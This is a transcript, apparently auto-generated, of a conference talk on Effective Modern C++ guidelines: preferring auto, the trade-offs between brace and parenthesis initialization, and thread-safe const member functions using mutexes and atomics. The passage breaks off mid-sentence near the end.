Well, good morning. I'm Scott Myers. I thought I'd be talking a little bit about C++ today. I am standing in the only location I can find on the entire stage where I could actually see you. This is relevant because if you want to ask questions and you raise your hand, I'm probably not going to be able to see you. So this is what we're going to do. Normally, what I tell people is if they don't understand something or if they're a little concerned, they should ask a question, which I want to encourage. If you feel uncomfortable asking a question, what I normally encourage people to do is to look really confused and to stare directly at me. But that's not going to work because I have lights in my eyes I won't be able to see you. So you have two choices. One of them is you can make lots of motion like this because I think like insects, I can in fact detect motion. So that's one possibility. Or if you see me, go to the only location on the stage where I can see you, that might help. Or you can start making really uncomfortable sounds as if there's just something terribly wrong and then I'll try and figure out what's going on. So that's the plan for questions and answers. Also, if you don't want me to see you, you need to encourage me to go any place except that one location on the stage. I want to talk today about effective modern C++, which is the latest project I've been working on to try to put together guidelines for how to make the most effective use of the language. And in this particular case, when I talk about the language, I'm talking about the new features in C++ 11 and C++ 14. So for purposes of the discussion today, I'm assuming you already know everything in C++ 98. That's old stuff. So the question is, how do you make effective use of the newer stuff? And the outline that I have for the work that I've been doing is to break down the general topic areas in C++ 11, C++ 14. This is what I've broken them down into. When I started the project, I did not plan to talk about type deduction at all. I don't like talking about type deduction. It's kind of a dull topic. I found out I was unable to discuss C++ 11 and especially C++ 14 without explaining how type deduction works because type deduction is widespread in C++ 11. It is essentially much more widespread in C++ 14. That's a whole separate talk. In fact, I'll be giving a talk on that topic this afternoon at 4.20. So that's a different talk. The other topic areas that I have been investigating, putting together guidelines is auto, gets its own chapter, a whole bunch of information on changing the habits you have from C++ 98 to moving to C++ 11 and C++ 14, different ways of doing things. Chapter on smart pointers, chapter on R value references, chapter on lambdas, chapter on the concurrency API. The only things I'm going to be talking about today because we have a limited amount of time is I chose three guidelines that I hope will be useful and give you some insight. They happen to come from the information on auto as well as the information on moving from C++ 11, excuse me, C++ 98 to C++ 11 and 14. And as it turns out in this particular presentation, I'm not talking about anything specific to C++ 14 at all. I'm only talking about C++ 11 stuff. It just kind of worked out that way. And the first guideline I want to give you is to prefer auto to explicit type declarations. So fundamentally, you have a choice here. So if I want to create some widget W, I have a choice. I can say, okay, I want a widget called W by giving the type explicitly and then I initialize it with some expression of type widget. Or what I could do instead is I could say auto W and then give an expression of type widget. In both cases, they will create a widget object. So what I'm encouraging you to do is to not type out widget expressly but instead to use auto, which leads to the question, why am I advocating that? So we'll start with the little stuff first. The little stuff is that using auto saves you some keystrokes, which is important from a typing perspective. It is in some sense more important from a reader's perspective because the more you can get rid of noise that's in your source code, the easier it is for people to understand basically what you are trying to accomplish. So if I have, I guess this is the day for hitting wrong buttons, if I have a vector of string iterators, VSI, so it's just a vector of iterators into some strings, and I want to do something for every iterator in that container, what I could say is, okay, for every string iterator SI in the container VSI, where I'm explicitly stating the type, or I can just say, listen, for every iterator SI in the container, and I just use auto here, my feeling is in this particular case, explicitly stating that it's a string iterator does not add any information that is not already present in the source code. Anybody reading this has got to know this is a container of string iterators or they'll never understand the code. So I think auto makes it easier to understand and of course easier to type. Now, the easier to type thing normally is not a very compelling argument, but there are some cases where it can be helpful. So if I'm writing an algorithm taking a begin and an end iterator, and I decide what I want to do is I want to make a copy of the first element in the range, and we'll make the assumption it's not an empty range. Well, if I have an iterator pointing to something, the question is, what is the type of the thing that it refers to? And I know you all roll your eyes and you say, well, of course, it's type name, standard iterator traits of iterator, colon, colon, value type. Who does not know that? Actually, it turns out several people don't know that. And even if you do know it, I don't know how many people have said, you know, what I'm really looking forward today is typing this many, many times. That's not really productivity flowing through your fingers. Now, in this particular case, you can just say auto first element is star B. This is very clear. B points to the first element of the range. So this is going to be a copy of it. So I think it's clearer for people to understand. Certainly, it's easier to write. However, that's really a syntactic convenience. There are some more compelling technical reasons for using auto. There are a number of cases in C++ where we think we know what the type of something is, but we're kind of loose about it. We're not actually specific. And here's a common kind of mistake. So if I have a vector event and I call the size member function, now, it turns out that the return type of calling size on a vector, in this particular case, it's vector event, colon, colon, size type, which is a type def for some unsigned type. But the return type is supposed to be vector event, colon, colon, size type. I don't know anybody who uses that. What most people do is something like saying, ah, it's an unsigned close enough for government work. It usually works. But as a specific example of a case where it can fail, so if you are on a 32-bit window system, this is completely safe code. There is nothing wrong with this. But the only reason there is nothing wrong with the code in the sense that it will actually work under all conditions is that an unsigned and a vector event, colon, colon, size type on that platform with that compiler are both 32 bits. So they're the same thing. It doesn't matter. But if you go from 32-bit windows to 64-bit windows, suddenly things change because on a 64-bit windows platform, an unsigned is 32 bits, but a vector event, colon, colon, size type is 64 bits, which means as long as the number of elements in the container is 0, 4 billion or fewer, it will work. But if it exceeds 4 billion, you've got a problem. Now, how many people when writing their unit tests are testing with containers of more than 4 billion elements? Let me go to my spot where I can see you. I'm not seeing too many. I'm seeing no hands. This is the kind of mistake that can creep in because you're not actually using the right type. If on the other hand you said auto of size is v.size, you automatically get the right type on the right platform. So now we're moving beyond simply it's easier to type. Now we're getting into some actual technical reasons. I have a map where the keys are strings and the values are integers. And now I decide what I want to do is some operation, it's a read-only operation on every one of the elements of that map. So it would be common for people to say, all right, for every reference to a constant pair from string to int because I know that a map holds pairs, the keys of string, the values of int, it's a read-only operation I want to perform so I don't want to copy that pair. So I'm going to have it by reference to constant. So this says for every one of those pairs in the map do something with it. It seems entirely reasonable. This will compile. This will run. This will run slowly. And the reason this will run slowly is because although this is a map from string to int, you may dimly recall that the key part of a map is declared const. So the contents of a map are actually const strings and ints. That's the type of pair stored in the map. It's a pair of a const string and an int. What this code says is take every one of those pairs consisting of a const string and an int. From it, copy it into an unnamed temporary pair of type string and int. So you just pay to copy everything. Bind that temporary to the reference to const and do something on the temporary, which is probably not what you wanted to do. Now, issue number one, performance problem. You're copying everything even though you specifically pass things by reference to const to avoid copying them. But there's some more subtle issues here, too. Inside the loop here, which I'm not showing, but inside the body of the loop, if you are assuming that you actually have a reference to a pair in the map, you have a reference to an element of that map. You're assuming, for example, you could take a pointer to it and get a pointer to a pair in the map. But with the code the way it's written here, if you take a pointer to it, you will take a pointer to the temporary copy of what's in the map. And the validity of that pointer will go away at the end of the loop iteration. You will be left with a dangling pointer. So if you stored that pointer someplace, maybe in another data structure, thinking that its lifetime was valid as long as the elements of the vector, you have a really fun way to spend the dark Norwegian winters debugging your code. However, if instead you decided to use auto, because that's what the cool kids do, you could just say const auto ref, and this will automatically pick up the appropriate type that is stored in the map. It's still stored by reference to const. This won't generate any temporaries at all. This will actually give you a reference to the elements of the container. Any questions about how this works? Yeah. So the question is what type would be deduced for auto here, essentially. And the answer is auto will deduce the actual type of what is stored in the container. So it's going to be a pair of const, string, and int. That's what auto will expand into. All right? At this point, I hope you are beginning to appreciate that auto is not a matter of making things easy for people to type, although that is part of it. That's sort of the initial allure. There's more to it. There's performance issues. There's correctness issues. Auto simply helps you for making certain kinds of mistakes. Let us suppose you create a function object. Probably the easiest way to create a function object is by using a lambda expression. If you create a lambda object, create a closure technically, and you want to store it in a runtime data structure so you can use it later. Maybe for example, you have a container of callbacks. So when an event occurs, you want to call some arbitrary number of functions. You need to be able to store the lambda somewhere. Now what you could do is you can store it using a standard function object here. So this is actually an object of a template which will store the closure created by the lambda. This will work fine. However, a standard function object is essentially fixed in size. During compilation, the compiler sets aside a certain amount of space for a function, a standard function object, because it's just a class instance. It uses a certain amount of memory. So the question is, what happens if the closure that is created from this lambda, what if the closure won't fit in that chunk of memory? Because it might not. It might be too big. No problem. Standard function under those conditions will allocate heap memory and will store the copy of the closure on the heap, which leads to the observation that the closure might be stored on the heap. So using this, depending on the size of the closure created from the lambda, which is determined by the number of objects that are captured by the lambda, you might pay for heap allocation. Of course, you'll pay for heap deallocation later. If I now take the resulting object, this is F1A, so this is a function object. If I now take this function object so I can call it, and I now say FLA of 22, this is an invocation of the function object. I'm calling the function object. Now internally, the function object might hold a pointer which points off to something on the heap, which is actually ultimately what's going to get invoked. And the reason that's important is because it means that this function call here possibly is an inline function call, but possibly is an out of line function call. Maybe it's inline, maybe it's not. It depends on a combination of factors, one of which is just how good the compiler is. Code works, code runs, or if you take exactly the same lambda and instead store it in an auto object, the compiler will figure out the type corresponding to this lambda, whatever that type is, the compiler figures it out. Once the compiler knows what the type is, it knows exactly how much space is needed to store an object of that type. It will therefore take an object of that type and it will put it on the stack in an object. This will not be stored on the heap under any conditions. So this is definitely not on the heap and this is not an optimization issue. It's just not on the heap. And when I now make the function call here, I'm going to say the closure call is typically inlined. In fact, I would assume it is going to be inlined. The only reason I say typically is because there's some language lawyers in this room and I have to watch out because the standard is not 100% guaranteed that it's going to be inlined. Having said that, it's going to be inlined. Maybe not in debug mode. So we end up with a situation with using a standard function object, unknown type. We possibly incur heap allocation and deallocation. We possibly give up inlining. Typing auto instead gives us definitely no heap allocation and deallocation and also essentially guarantees us inlining. Now, in this case here, I'm showing a function object created from a lambda. There's other ways to create function objects. So if you are one of the people who likes to use bind and Nico's talk not withstanding, there actually are some people who do like to use bind. Most of them are part of a 12 step program to eventually get them away from it. But there's still a few people going through that process. And in fairness, there's a lot of legacy code that uses bind because bind is a perfectly valid tool prior to C++11. So this idea of using auto to store function objects, it's not a lambda specific thing. It's valid for any function object. So I have encouraged you to use auto instead of using explicit type declarations. It's great advice, except when it doesn't work. Because sometimes auto does the wrong thing, which means we need to have a better understanding given the technical advantage we've talked about of when auto does the wrong thing and what to do about it. So the first thing it has to do with brace initializers. If I say auto, give a variable name and then I give a braced initializer, special rule in the standard. This deduces a type of standard initializer list of int. Now, if I only show you that piece of information, you might go, well, all right, that doesn't seem too bad. The problem is if I say auto x2 gets 5, it deduces a type of int. If I say auto x3 parenthesis 5, it deduces a type of int. So if I say auto and a type like an int, some syntaxes deduce the type of int. But if you use braces, it will deduce a different type. In particular, if I say braces like this with or without the equal sign, it makes no difference, they both deduce an initializer list of int. How many people have made this mistake in their code? Oh, you guys have not lived. It is a veritable right of passage when moving to C++11 to start typing auto and then suddenly find out that nothing is working the way that you expect only to find out. It's because you thought you were creating an int here and you actually created an initializer list. It's only the case for braces. Fundamentally, if I say auto x and then I have a braced initializer, the equal sign is optional. It does not matter whether the equal sign is there. It's the braces that are important. Basically, under these conditions, the type of the variable you are creating is not going to be the type of the expression. So decal type of x, the type of the variable you're creating is not going to be equal to the decal type of expression, the type of the expression you're using to initialize it, which is a little strange because normally you say auto deduces the type of the initializing expression. This is the one case where it does not. In this syntax here where I have auto and I have braces, that's the combination that leads to trouble. Auto and a braced initializer. Again, the equal sign doesn't make a difference. When you have that combination, then the type of the variable you are creating is more or less equal to an initializer list of the type of the expression. And the reason I say more or less equal is because I actually showed you what it was equal to, it would keep going over that direction for a ways. But frankly, what it is equal to is not anywhere near as important as understanding that it doesn't deduce the type that you expect. Yeah. The curly braces actually indicates that it's supposed to be an array. So the comment is that the curly braces initializes that it's supposed to be an array. The curly braces are used to mean more than one thing is the problem. In this particular context, it would be perfectly reasonable to say it's trying to interpret it as a sequence of values. C++ does not apply that interpretation consistently. It's kind of a bigger story. Regardless of whether it is applied consistently or not, what I will say is that this is literally the only place in C++ where a braced initializer will be deduced to have this type. As an example, if you take a braced initializer and you pass it to a template, type deduction will fail. A braced initializer does not have a type. It's just a special rule for auto. So many people have tried to say, okay, this is how I'm going to think about it. And there are ways to think about it that can help reduce the confusion. But as far as I know, there is no single interpretation which is consistent across the entire language. Another problem for type deduction, for auto type deduction, is hidden proxy types. So I'm going to talk about vector bool. If you've had a proper education in C++, when you see vector bool, you begin to feel nauseous. And because you've been taught you should never use it or possibly you shirk in fear. The only reason I'm using vector bool is because it is part of the standard library, which means you can verify everything I'm going to tell you by going to your standard library implementation and looking inside the code to see exactly how it's implemented. This is a representative of a large class of libraries that use what are known as proxy types. I only use this one because you can check this one out yourself. And I'll get back to that in a moment. So if I have a vector of bool, a vector of bool is a packed representation of bools. Every boolean takes a bit. So if I now say, okay, bool b1 is vb sub 5. Now in this case here, the type of b1 is bool. Unsurprising. I've declared it to be bool, so b1's type is bool. This is not a surprise. If I say auto b2 gets vb sub 5, we have a problem. The reason we have a problem is because vb sub 5, the indexing operator for a vector, the indexing operator for a vector normally returns a reference to the indexed element. If I say vb sub 3, I normally get a reference to the third element. You can't have a reference to a bit. Small addressable thing in C++ is a char. You can't have a reference to a bit, but this is a vector of bits, basically. So the question is, how do they make that work? The way that it works is because vb sub 5 for vector of bool returns an object of type vector of bool, colon, colon reference, which is actually a class. Don't be fooled by the name. It's a class. It happens to be called reference. So when I say auto b2, the type I get back is vector of bool, colon, colon reference. So this code compiles. But you don't have the type you think you have. In many, many cases, you'll continue to use the object. It'll behave exactly the way that you think it's going to behave because there's an implicit conversion from vector of bool, colon, colon reference to bool. So if you ever try to use this thing in a boolean context, it converts and life goes on. Almost like they designed it that way. But the fact that the return type of the array bracket operator on a vector of bool is not a reference, you can tell from time to time. For example, if I were to assert that the address of b1 is not equal to the address of b2, which makes sense. Local variable v1, local variable b2, they had better not have the same address. If they had the same address, the compiler was doing something very peculiar. So I should be able to assert that they definitely are not at the same location on the stack. That assertion will not compile. And the reason the assertion won't compile is because you are attempting to compare a pointer to a bool with a pointer to a vector of bool, colon, colon reference, and you can't compare two different pointer types that have nothing in common. So the code won't compile. Think about proxies. Proxy objects are designed to stand for something else. So a vector of bool, colon, colon reference object is designed to stand for a bool. And there are some assumptions made usually by implementers regarding the lifetime of those temporaries. And in particular, a common assumption is that they're not going to live beyond the end of the statement. As an example, in GCC 4.7, probably still true in 4.9, I just haven't checked. I don't check every time a new version of the compiler comes out. In GCC 4.7, vector of bool, colon, colon reference, that type, and you can consult the library to find out what it does, that type contains a pointer to a word on the machine with the referenced bit. Remember, it stands for a bit. So what you actually get back is an object which has a pointer, the pointer points to the word, and it's got an offset which tells it which bit in the word is the one that it points to. So a vector of bool, colon, colon reference is a pointer and an index that says this word, this location in the word. That's how it's implemented on that particular library. At least it was in GCC 4.7. Now that means we have a pointer to a chunk of memory and that leads to the possibility that we can have a dangling pointer if the lifetimes aren't correct. I have an example. So here's a function called make bool veck. It's a factory function. It returns a vector of bool. So this is a function, creates a vector of bool, returns it as its return value. Now what I do is I say make bool veck, that's the function call. So make bool veck gives me this return value which is a vector of bool. I index it to get element number three which we will assume is a valid element. So now I have one of these vector of bool, colon, colon reference objects. It contains in GCC's case a pointer and an index. But I've declared the result type to be of bool. So there's an implicit conversion from a vector of bool, colon, colon reference into a bool. So what it does is it takes the pointer, goes to the word, finds the bit, sees if it's true or false, sticks the value in b1, life's wonderful. Everything works. Instead, if I say, okay, auto bit is make bool veck sub three, again call make bool veck, get a temporary vector of bool, index into get element number three which we will assume exists, get back a proxy object which we now store. So now I've got this proxy object called bit. It contains a pointer to the vector of bool that was returned by this function. That would be the vector of bool that will be automatically destroyed at the end of the statement because it's a function's return value. Which means by the time we finish executing this lovely little semicolon here, we have this charming object on the stack which contains a pointer to memory which no longer corresponds to a vector of bool. And now I just say, okay, b2 is of type bool and it's a copy of bit. This has undefined behavior. Now these two statements appear conceptually to do the same thing but they don't do the same thing. So this is an example of where auto deduces the wrong type. I mean auto deduces the right type, just the wrong type from what we want. As I said, the reason that I chose vector of bool is because you can verify everything. I'm telling you by looking at your library implementation to see exactly what they do with vector of bool, colon, colon reference. Have a field day. I'm not lying to you. But you're probably not using vector of bool. But if you are using other third party libraries, especially in areas where you're trying to get maximum performance, which turns out to not be terribly uncommon for C++ developers, you could well be using a library that is using proxy types. A while ago I took a look at the boost library. So this is an example of some boost libraries. Boost Ublast, boost expressive, boost proto, boost meta state machine. All of those libraries use proxies. How do I know? They document it. I do not know of an easy way to avoid having auto deduce a proxy type. It alas requires some knowledge of the library that you are using. Essentially what's happening is when you use auto with those kinds of libraries, it is deducing an implementation detail that the library author had hoped to keep hidden from you. And you need to be aware that if you use auto, there is a possibility that you're going to have that problem. So if you know you're using this kind of a library and the only way I know of to know that is to simply read some documentation about the library, you need to use auto with greater caution. Doesn't mean you don't use it. Just means you need to be aware that you don't want to use it probably all the time. And for what it's worth, there actually have been some proposals for C++ 17 or maybe C++ 20 or C++ 23. Maybe they'll fix it, but it doesn't do us any good right now. So for the foreseeable future, you just need to be aware of this problem. When I talk about auto, some of these people are very resistant to the idea. And they go, you know, I'm not going to be able to understand the code and I'm very concerned about having maximum code clarity. This is fine. So if you believe in your professional software engineering judgment as engineers that if the explicit type is clearer, if it will yield clearer, easier to understand, easier to maintain code, great. That's what they pay you for, is to use that engineering judgment, use it. But I do think it is important to bear in mind that first there's been a ton of success in other languages with similar features. C++ is not at the cutting edge of type inference. C++ is at the leading edge of type inference. This caused me the trailing end of type inference. So this is not new territory. And I also remark as a practical matter, a lot of people using IDEs, for example, Visual Studio, the type of an auto-divisible variable is actually visible in the IDE. So although it may not be expressly visible in the source code, it could be visible through a tool that you are using in your developing your code. So I think you should bear that in mind when making the decision whether to use auto or not use auto. So my guidelines are to prefer auto to explicit type declarations, which I do think yields, generally speaking, easier to write, easier to read code in many cases and avoid certain kinds of tricky errors involving either performance or correctness as we have seen. And certainly you should definitely remember that auto plus a brace initializer will always deduce an initializer list type. Any questions on that? I'm sorry, time's up. New guideline. I want to talk about parentheses versus braces, which builds a little bit on Nico's talk last time. My guideline, and I spent literally years trying to figure out what is my advice about parentheses versus braces. And my advice is understand the trade-offs because I don't think there is a great piece of advice for what to do. We start with the notion of uniform initialization. Uniform initialization. It's uniform. We can use it everywhere. Braces, it's great. So if we want to initialize an integer with 44, this will work. Remember, don't use auto. If I have a struct and I want to initialize the fields of the struct, I can use braces. Great. If I have a string and I want to give it a value, I can use braces. Oh, so wonderful. If I have a class, it has a data member, I can use braces on the member initialization list. This is so cool. If I have an array, I can use braces. Somebody mentioned a lyric. It's supposed to have values of an array, but that's not the only place. If I have a vector, I can use braces. If I have a raw freaking pointer, I can use braces to initialize its value. Not that anybody would use pointers. Uniform initialization. That's the sales pitch. You can use it everywhere. I don't use the term uniform initialization. And the reason I don't use the uniform initialization is because that suggests it's uniform. You should use it everywhere. And I don't believe that that is reasonable advice. I think there's a lot of advantages to what's known as uniform initialization. However, I prefer to refer to it as brace initialization. That's what I'll be calling it from now on. So, first thing about brace initialization is it has the unique feature which is that narrowing conversions are illegal. Only brace initialization will reject narrowing conversions. A narrowing conversion basically means that the compiler cannot guarantee that the value of a larger type will be able to be stored in a smaller type. So, as an example, if I have a point which has two integers and I say point P1, curly brace 1, 2.5. Now, in C++98, this was completely fine code. The 2.5, which is a double, would be truncated to initialize Y. So, in C++98, that compiles has well-defined semantics. In C++11, this code will not compile. And the reason it won't compile is because I'm using braces and this is a double and that's an int. And 2.5, last I checked, cannot be exactly represented as an integer. Code won't compile. So, if you want it to compile, you can make it compile, you just do a cast. All the cool kids use static casts. C casts. But it's important to understand this notion of rejecting narrowing conversions exists in exactly one place in the language. Only brace initialization. So, if I say int A is 2.5, this used to compile because it goes back to the days of C and it still compiles. It'll truncate to 2 and initialize your integer. No warning, no error. Well, no error. Might get a warning. But if you try to do exactly the same thing using braces, the code will be rejected. Given that narrowing conversions normally don't make any sense, like I want to store a double as an int, an implicit truncation, I think it's a feature that braces don't let you do that. That's a plus. We now have two different syntaxes for calling constructors. So I can say, widget w1 and I pass some arguments in curly braces, widget w2 and I pass arguments in parentheses. They both work, usually. Both choose the best match constructor. However, there are different rules for what it means to be the best match. Now, this is something that Nico talked about in his last presentation. Only brace initialization matches initializer list parameters and those matches are actually preferred. Let me give you an example. So this is a simplified declaration from the standard library, from the standard vector class. So here's vector. It takes a number of elements and a value. It takes an initializer list of t. This is not affected by the change that Nico was talking about at the end of his last talk. So if I say v1 with 100, 5, notice that I'm using braces. Now, because I'm using braces, I could pass the 100 is the size and the 5 is the initial value. Two arguments. That would work. Or I could say 105 are two initial values to go into the vector. There is, in some sense, ambiguity here. But the language rules say when you use braces and it is possible to call an initializer list constructor, that is the one that you call. It's not ambiguous. So this means that the size of the vector is 2 and the values are 105. It calls this second constructor. If I take exactly the same code and I say, you know, I'm a traditionalist, I like the old ways. And the old ways of passing constructor arguments was to use parentheses. So exactly the same code. But now I use parentheses. Under these conditions, now it calls the first constructor because initializer list constructors are only considered if you use braces. If you don't use braces, they're not even considered. So the result of this is a vector whose size is 100 and values is set to 5. All of them are 5. So it does something different. They're not interchangeable. Now, this only makes a difference if you actually have an initializer list constructor. So here's a gadget class. It has one constructor. It takes two integers. So if I say I want to create a gadget G1 with 10 and 20 or a G2 also with 10 and 20 braces and parentheses, they do exactly the same thing. They both call this constructor. Makes no difference. They do the same thing. If I now say G3 with 89.5 and 0, notice that I'm using parentheses, compiler says, okay, 89.5, that's a double. I'm going to pass it to an int. No problem. I'll take that 89.5, get rid of that pesky 0.5. We didn't want that half of a number anyway. Compiles. But if I do the same thing inside curly braces, it won't compile. And the reason it won't compile is because this double can't be expressed in that integer exactly. Again, you get brace initialization, rejects narrowing conversions. Yes? Is the question, does this also apply to larger integer types going to smaller integer types? Correct. It does. Essentially, the way it is is the only time that if you have a larger type going to a smaller type, the only time that that will be permitted to compile is if the compiler can prove that it will fit as an example. If I said I want to initialize an int and I said the initial value is going to be 22 long, so long is bigger than an int in general. But we know that the value 22 will fit in an int. That will compile. On the other hand, if I said long L equals 22 and then initialize the int with the long in curly braces, that won't compile. Make sense? Yes. Okay. So basically, it doesn't compile unless the compiler can guarantee it's okay. Was there a question? What happened to the specter, your example showing us that there is no specter in the case of the initializer list. Okay. So all right. Is your question, what would happen here if we did not have the initializer list constructor? Okay. If we didn't have the initializer list constructor, they'd both call the first constructor. They do exactly the same thing. That's essentially the same as this example here. All right. So now, this leads to some really interesting situations. So I got tired of using widgets. I've been talking about widgets for 20 years. I'm moving on. I'm progressing. I'm growing. Let's talk about thingies. So I got a thingie, takes an int and an int, and thingies take initializer list of double. So if I say parentheses with 10 and 20, it calls the first one. Remember, with parentheses, it will never call an initializer list constructor. It's very simple. It won't call it. If I use braces here, notice that these are integers, and x and y are integers, and this is an initializer list of double. It's going to be a better match to go from two ints converted to doubles than two ints calling x and y. If there is a way to make the initializer list constructor work with braces, that's what it'll get called. If I have T3, 89.5 and 0, this is a matter of type conversion. So this will call number one. Notice that I've got a double here. This is a double. It still won't try to be converted into an initializer list. If you are using parentheses, the compiler literally pretends as if that constructor, the one with the initializer list, did not exist. All right. Now, this means that we can get some really interesting implications if we add new constructors to classes. Now, I want to be clear here. Anytime you have a class with some interface and you add a new overload to that class, it is possible that existing code that used to call some function in your class may now start calling the other overload. That's inherent when you add a new overload. So there's nothing special about initializer lists here. If you add a new overload to an overload set, code that used to compile and call one overload might now call the new overload, which is probably why you added it. So in this case here, I've got a widget. I'm using braces because I've embraced the uniform initialization lifestyle. This calls widget with 10 and 20. Life goes on. Life's good. Somebody comes along later. They add an initializer list constructor to it. Notice that it's an initializer list of float. This code, unchanged, legacy code, no longer calls this constructor. It now gets converted to two floats because braces really want to match an initializer list constructor. If there is any way to make it compile, it will compile. This is neither a good thing nor a bad thing. It's just a characteristic of the way overload resolution works in C++ and you need to be aware of it. Now, presumably when you added this initializer list overload, you said anytime anybody is using braces, I want to treat that as an initializer list. That's not what you meant. You need to have a little talk with the API designers. So here's our situation. Essentially, we've talked about this here. So the guideline is to distinguish between parentheses and braces when initializing objects. Any questions about that? All right. The last guideline I want to talk about then is to make const member functions thread safe. We have known from the beginning of C++ that there were two different ways to interpret const nest. There's logical const nest, which means conceptually nothing changes. And there's bitwise const nest, which means none of the bits inside an object actually gets modified. So bitwise const nest, this is what compilers enforce, conceptual const nest, this is what developers should implement. With any luck, this is completely old news. We've been talking about this since 1995. I've been talking about this since 1995. My God, what happened to me? 1995, never mind. All right. Mutable. Also available since 1998. Mutable, as I like to put it, tells the compiler, ha, ha, I was kidding about the const. So a mutable data member is permitted to be modified even inside a const member function. It is very useful when implementing conceptual const nest in particular for doing things like caching, which is probably its most common use. So here I have a widget class. It has a member function called magic value, which computes a magic value. So computing the magic value conceptually does not change the widget. If I get to a widget and say, so what's your magic value, it goes crunch, crunch, crunch, crunch. Here's my magic value, but it didn't change the widget. It's the same widget it was before. If, however, we assume that it's computationally expensive to determine what the magic value is, we would prefer not to have to compute it unless somebody asks for it, which means we don't want to compute it up front. But if somebody does ask us for it, we don't want to have to compute it multiple times because it's expensive, which means we'd like to cache it if we ever do compute it. So we can implement it like this. We could say, all right, I'm going to create a mutable bool called cache valid and a mutable int cached value. What I'm going to do is if I ever compute the value of the magic number, I will store it and then I will say that the cached value is valid. So I can look it up again in the future, save myself some time. So here's my code. If the cache is valid, great, I just return the cached value. Now, if the cache is not valid, maybe because nobody's ever called this function before, then what I do is I say, okay, the cached value is, I call some expensive computation, I say the cached valid is now true and I return the cached value. Perfectly standard way of implementing a cache using mutable. In C++ 98, there's no C++ 11 here. Works fine. Life's good. C++ introduced this tiny new feature. It's called concurrency. It has some minor implications for programmers. For example, nothing works anymore. A few things work. But as an example, let us suppose that I've got some widget W and now in thread one, I say auto v1 is W magic value. Crunch, crunch, crunch, crunch. It's figuring out the magic value. Thread two at the same time calls W magic value. Crunch, crunch, crunch, crunch. Just doing the same thing. Now, I want to go back a slide and show you that magic value I have declared to be a const member function. It does not change the conceptual state of the widget. You should be able to have multiple people reading a widget simultaneously. They're all readers. And because I declared it const, because it is logically const, I have declared these two data members mutable. The problem I have is that in this case here, here's thread number one, it's calling a const member function. It's a read operation. Here's thread number two. It's calling a const member function. It's a read operation. If I know that I'm writing code with multiple threads simultaneously reading something, that does not require synchronization. I don't need to get a mutex or anything else if all my threads are readers. It's safe to read things simultaneously. It's conceptually safe. The problem is that magic value, in case you've forgotten, that was the previous slide, those look like write operations to me. The const member function is conceptually const. It fulfills the conceptual const requirement. The problem is it's not bitwise const. And that makes a big difference when it comes to concurrency. So this means both of the reads may actually write the mutable data members, which means we have two threads which are both readers and writers. That's the definition of a data race. That means undefined behavior. And that's just bad. What's key here is there's nothing wrong with the calling code. Both threads are performing read operations. There's nothing wrong with those threads. They're doing perfectly reasonable behavior. Possibly the code was written so they would do a lot of reads. So you can't blame them. Well, if the client code's not wrong and the behavior's undefined, that pretty much means the implementation code is wrong. No other way to look at that. Widget magic value is a broken function. Now, fixing it is really easy, and this is where C++11 comes in. So all we have to do is, okay, I'm going to slap in a mutex, and I'm going to declare the mutex to be mutable because locking a mutex changes its state. It's a non-const operation. Unlocking a mutex also changes its state. Non-const operation. So I need to perform non-const operations on the mutable inside the const member function. Sorry, on the mutex. So no problem. I lock the mutex at the beginning of the function. I perform the operation to figure out what the value is, and then this object in its destructor will automatically unlock the mutex, so this closed curly brace here unlocks the mutex. This works fine. This fixes the problem. Now, in some cases you don't need a mutex. In some cases you might only need an atomic variable, which is a variable where operations on it are guaranteed to be viewed atomically by other threads. For example, let's suppose I'm keeping track of how many times the function is called. So here's my gadget class. Here's a get-wait function, and for whatever reason I want to know how often is get-wait called. Under those conditions I could have an int and I could have a mutex to limit access to the int, but or what I can do, which is a little faster in many cases, is I can just use an atomic unsigned. So what that means is that when I call plus plus call count, that's a read modify write operation. It's guaranteed to be executed atomically, typically through a single underlying machine instruction. Typically it is faster at runtime than using a mutex. So this works fine. So notice I'm not saying you should always use a mutex. This doesn't need a mutex. However, if we go back to our example with the cache and we say, okay, I'm going to make the cached value an atomic int and the cached valid an atomic bool, this is the way of thinking it says, well, if atomic is cheaper than using a mutex, I'm going to use them all over the place. I'm a C++ programmer. I don't pay for what I don't need. So here's the code again. Now in this case I've rewritten it a little bit differently here. So I check the cache to see if it's valid. If so, I return cache value. Otherwise, in this case, I perform an expensive computation number one, which I store as V1. I now perform an expensive computation number two, which I store as V2. I now say, okay, the cache is valid. That's true now. And I return the cache value, which is V1 plus V2. So I've just broken the expensive computation into two pieces. It's all I've done. This is not thread safe. Why not? Let me get in my spot. Okay. Now I can see you. Yes. Each of the lines are atomic, but the whole transaction is not atomic. Okay. You are correct. Each of the lines is atomic, but the transaction is a whole, excuse me, the whole thing is not transactional. The problem is that one thread can come in, see that cache is not valid, start doing the expensive computations, and then can say cache valid is set to true. In the meantime, another thread comes in and goes, oh, the cache is valid because the other thread just set it to true. So it now returns the cache value, but we haven't computed the cache value yet because the first thread hasn't yet performed the sum operation. Oops, wrong answer. Only happens once every five years or so. So we don't really care. We can fix that operation, you say. No problem. What we'll do is we'll compute the cache value before we set cache valid to true. Right? That'll fix the problem. It will fix the problem. You'll get the right answer. This works. It just works harder than it should. Thread comes in, checks to see if cache valid is true. It's not. Starts performing the expensive computations and then adds V1 and V2 together. At this point, we've performed the expensive computations. We are ready to go. Another thread comes in, checks to see if cache is valid. It's not yet because we haven't yet executed this statement in the first thread. Enters the loop, starts those expensive computations all over again. In the meantime, 22 other threads also check cache valid simultaneously because you are running on a 48 core machine. And they are now all performing the expensive computations. You are really going to get the answer now. Yes? So the question is, won't each thread get its own value? If we proceed on the assumption that there is only one magic value for the widget, in other words, no matter how many times you compute it, it will always get the right answer, every thread should ultimately get the same answer. It's just that we're going to compute those sub-computations every time. Let me think for a minute. Let me put it this way. That's the best case scenario. Okay? Let me check and see. Okay, in this particular case, because they're both atomic, I don't have to worry about partial results being read by thread, so I believe that what I said is true. But even if this does return the right answer all the time, it's much more expensive than it needs to be. So, you know, the problem is if you have more than one data member and they need to be kept in sync somehow, you need a transaction. If you need a transaction, almost certainly what you want to do is use a mutex. So declare the mutex as I showed you before. Now cache value and cache valid, these don't need to be atomic any longer. Now atomics are more expensive than non-atomics, cheaper than mutexes, but more expensive than non-atomic. So these can now become regular, ordinary, instant bools because we're now using the lock guard solution. So if you have a const member function in C++11, the first version of the language that supports concurrency, it should either be bitwise const or it should be internally synchronized, meaning that if it's doing read and write operations, outside callers can call it safely without having to acquire a mutex. If you find yourself in a situation where you know for a fact that your class will never be used concurrently, you just know that. Simplest way to know it, you're writing a single threaded application. There's no other threads. Under those conditions, then using atomics or acquiring and releasing a mutex is incurring a cost you 